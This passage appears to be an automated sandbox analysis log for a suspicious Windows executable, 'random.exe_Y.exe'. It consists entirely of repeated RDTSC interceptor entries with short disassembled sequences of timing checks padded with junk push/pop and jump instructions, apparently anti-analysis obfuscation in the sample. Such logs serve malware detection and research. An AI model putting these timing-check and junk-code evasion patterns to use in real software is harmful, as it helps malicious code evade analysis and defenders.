                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 30D93C second address: 30D942 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 30DACF second address: 30DAFC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3458756CACh 0x00000007 jmp 00007F3458756CADh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 push edx 0x00000012 pop edx 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 jo 00007F3458756CC3h 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 30E498 second address: 30E4CD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F3458CA514Eh 0x0000000a popad 0x0000000b jmp 00007F3458CA5159h 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 30E4CD second address: 30E4D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 30E4D1 second address: 30E4E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F3458CA514Ah 0x0000000d rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 30E4E3 second address: 30E501 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3458756CB4h 0x00000007 jg 00007F3458756CACh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 3132CF second address: 313310 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 pop eax 0x00000009 popad 0x0000000a pushad 0x0000000b jmp 00007F3458CA5155h 0x00000010 je 00007F3458CA5146h 0x00000016 push edx 0x00000017 pop edx 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b pushad 0x0000001c pushad 0x0000001d jp 00007F3458CA5146h 0x00000023 jnc 00007F3458CA5146h 0x00000029 jng 00007F3458CA5146h 0x0000002f push eax 0x00000030 push edx 0x00000031 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 313310 second address: 31331D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jns 00007F3458756CA6h 0x0000000d rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 31331D second address: 313321 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 313321 second address: 313327 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 313327 second address: 313331 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 276400 second address: 276417 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3458756CB3h 0x00000009 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 276417 second address: 276421 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F3458CA5146h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 312603 second address: 312627 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3458756CADh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F3458756CB3h 0x0000000e rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 3127A6 second address: 3127B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jbe 00007F3458CA5146h 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 3127B6 second address: 3127C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a jng 00007F3458756CA6h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 3127C8 second address: 3127CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 3127CC second address: 3127D6 instructions: 0x00000000 rdtsc 0x00000002 js 00007F3458756CA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 3127D6 second address: 3127DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 312E64 second address: 312E68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 312E68 second address: 312E6C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 312E6C second address: 312E77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 31A6BA second address: 31A720 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 jmp 00007F3458CA5157h 0x0000000d js 00007F3458CA5146h 0x00000013 jno 00007F3458CA5146h 0x00000019 push ecx 0x0000001a pop ecx 0x0000001b popad 0x0000001c jp 00007F3458CA5152h 0x00000022 jbe 00007F3458CA5155h 0x00000028 push esi 0x00000029 pop esi 0x0000002a jmp 00007F3458CA514Dh 0x0000002f popad 0x00000030 push eax 0x00000031 push edx 0x00000032 push eax 0x00000033 push edx 0x00000034 jnl 00007F3458CA5146h 0x0000003a jbe 00007F3458CA5146h 0x00000040 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 31A720 second address: 31A737 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3458756CB3h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 31A737 second address: 31A747 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jl 00007F3458CA514Ah 0x0000000c pushad 0x0000000d popad 0x0000000e push edi 0x0000000f pop edi 0x00000010 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 31A747 second address: 31A74E instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 3188EE second address: 3188FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push edx 0x00000007 pushad 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 318FDA second address: 318FDF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 318FDF second address: 318FE4 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 3195A4 second address: 3195EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3458756CADh 0x00000009 pop esi 0x0000000a push edx 0x0000000b jmp 00007F3458756CB8h 0x00000010 jmp 00007F3458756CB6h 0x00000015 pop edx 0x00000016 popad 0x00000017 push eax 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 319E7B second address: 319EC6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3458CA5151h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jne 00007F3458CA5152h 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F3458CA514Ch 0x00000016 pushad 0x00000017 jmp 00007F3458CA5152h 0x0000001c pushad 0x0000001d popad 0x0000001e popad 0x0000001f rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 319EC6 second address: 319ED0 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F3458756CACh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 31E456 second address: 31E468 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3458CA514Eh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 31E5AF second address: 31E5CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jmp 00007F3458756CB2h 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 31E5CA second address: 31E5D4 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F3458CA5146h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 31E5D4 second address: 31E5DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 31E5DF second address: 31E5F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push ecx 0x00000007 jo 00007F3458CA5148h 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 31E752 second address: 31E756 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 31E756 second address: 31E75C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 31EC9C second address: 31ECB2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3458756CABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 31ECB2 second address: 31ECB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 32CFFC second address: 32D009 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 jne 00007F3458756CA6h 0x0000000c popad 0x0000000d rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 32D419 second address: 32D41F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 32D41F second address: 32D425 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 32D5AE second address: 32D5B4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 32D5B4 second address: 32D5BA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 32D5BA second address: 32D5C0 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 32D6F7 second address: 32D727 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F3458756CA6h 0x0000000a push edx 0x0000000b pop edx 0x0000000c jnc 00007F3458756CA6h 0x00000012 popad 0x00000013 push ebx 0x00000014 jmp 00007F3458756CAAh 0x00000019 pushad 0x0000001a popad 0x0000001b pop ebx 0x0000001c pushad 0x0000001d push eax 0x0000001e push edx 0x0000001f jp 00007F3458756CA6h 0x00000025 jng 00007F3458756CA6h 0x0000002b rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 32D727 second address: 32D72D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 32D72D second address: 32D737 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 32D737 second address: 32D741 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F3458CA5146h 0x0000000a rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 32D9BA second address: 32D9D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3458756CB5h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 32DB1C second address: 32DB46 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F3458CA5146h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d push edi 0x0000000e pushad 0x0000000f popad 0x00000010 pop edi 0x00000011 pushad 0x00000012 jmp 00007F3458CA514Fh 0x00000017 jbe 00007F3458CA5146h 0x0000001d pushad 0x0000001e popad 0x0000001f popad 0x00000020 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 32DB46 second address: 32DB4B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 32DC8C second address: 32DC96 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F3458CA5146h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 32DC96 second address: 32DC9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 32EC56 second address: 32EC73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F3458CA5146h 0x0000000a popad 0x0000000b pushad 0x0000000c push edx 0x0000000d pop edx 0x0000000e jmp 00007F3458CA514Dh 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 32CBF3 second address: 32CC1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 pushad 0x00000007 jmp 00007F3458756CAAh 0x0000000c jmp 00007F3458756CAEh 0x00000011 pushad 0x00000012 jbe 00007F3458756CA6h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 348458 second address: 34845C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 34845C second address: 348462 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 348462 second address: 348468 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 347FD3 second address: 347FD9 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 3504AD second address: 3504B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 3504B1 second address: 3504C2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jg 00007F3458756CA6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ecx 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 3504C2 second address: 3504C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 3504C7 second address: 3504CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 3504CD second address: 3504D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 3504D3 second address: 3504E2 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jnp 00007F3458756CA6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 35FF09 second address: 35FF2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F3458CA5146h 0x0000000a popad 0x0000000b jmp 00007F3458CA514Fh 0x00000010 pushad 0x00000011 push edi 0x00000012 pop edi 0x00000013 jg 00007F3458CA5146h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 35FF2E second address: 35FF36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 35E684 second address: 35E69C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F3458CA5152h 0x0000000b rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 35E69C second address: 35E6A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 35E6A0 second address: 35E6A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 35E7F5 second address: 35E7FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 35E7FA second address: 35E800 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 35E800 second address: 35E806 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 35E806 second address: 35E80A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 35E80A second address: 35E80E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 35EC55 second address: 35EC5E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 35EC5E second address: 35EC7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jnl 00007F3458756CB8h 0x0000000f rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 35EC7F second address: 35EC8B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007F3458CA5146h 0x0000000a push edi 0x0000000b pop edi 0x0000000c rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 35EF63 second address: 35EF67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 35EF67 second address: 35EF8C instructions: 0x00000000 rdtsc 0x00000002 js 00007F3458CA5146h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d jmp 00007F3458CA5157h 0x00000012 popad 0x00000013 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 35F0EE second address: 35F0F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 35F0F6 second address: 35F104 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 jnc 00007F3458CA5146h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 35FB8A second address: 35FB90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 3655F8 second address: 365625 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pushad 0x00000006 popad 0x00000007 js 00007F3458CA5146h 0x0000000d jmp 00007F3458CA514Ah 0x00000012 popad 0x00000013 pushad 0x00000014 jmp 00007F3458CA5152h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 377111 second address: 377125 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3458756CAFh 0x00000009 popad 0x0000000a rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 371ABD second address: 371AE0 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F3458CA5146h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edi 0x0000000b jmp 00007F3458CA5156h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 371AE0 second address: 371B07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push ecx 0x00000006 jo 00007F3458756CC5h 0x0000000c jmp 00007F3458756CB9h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 383476 second address: 38347C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 38347C second address: 383492 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F3458756CACh 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 383492 second address: 3834AA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3458CA5154h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
